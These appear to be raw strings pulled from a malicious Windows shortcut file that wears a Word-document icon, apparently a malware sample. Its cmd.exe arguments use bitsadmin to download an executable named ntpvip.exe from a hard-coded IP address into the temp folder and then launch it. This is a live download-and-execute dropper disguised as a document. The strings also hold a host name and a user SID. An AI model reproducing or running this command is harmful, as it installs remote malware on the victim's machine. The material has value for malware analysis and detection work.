Windows
System32
OwH7W!
cmd.exe
Windows 10
C:\Windows\System32\cmd.exe
%comspec%
windows-c6ojf5r
%USERPROFILE%\Desktop\Logo app\docx.ico
4Windows
vSystem32
[cmd.exe
Microsoft Corporation!..\..\..\Windows\System32\cmd.exe
/C bitsadmin /transfer Update /download /priority FOREGROUND http://103.38.236.46/ntpvip.exe %temp%\ntpvip.exe' & start %temp%\ntpvip.exe'0C:\Users\Administrator\Desktop\Logo app\docx.ico
%comspec%
%USERPROFILE%\Desktop\Logo app\docx.ico
S-1-5-21-2504933495-2668716528-1304624358-1000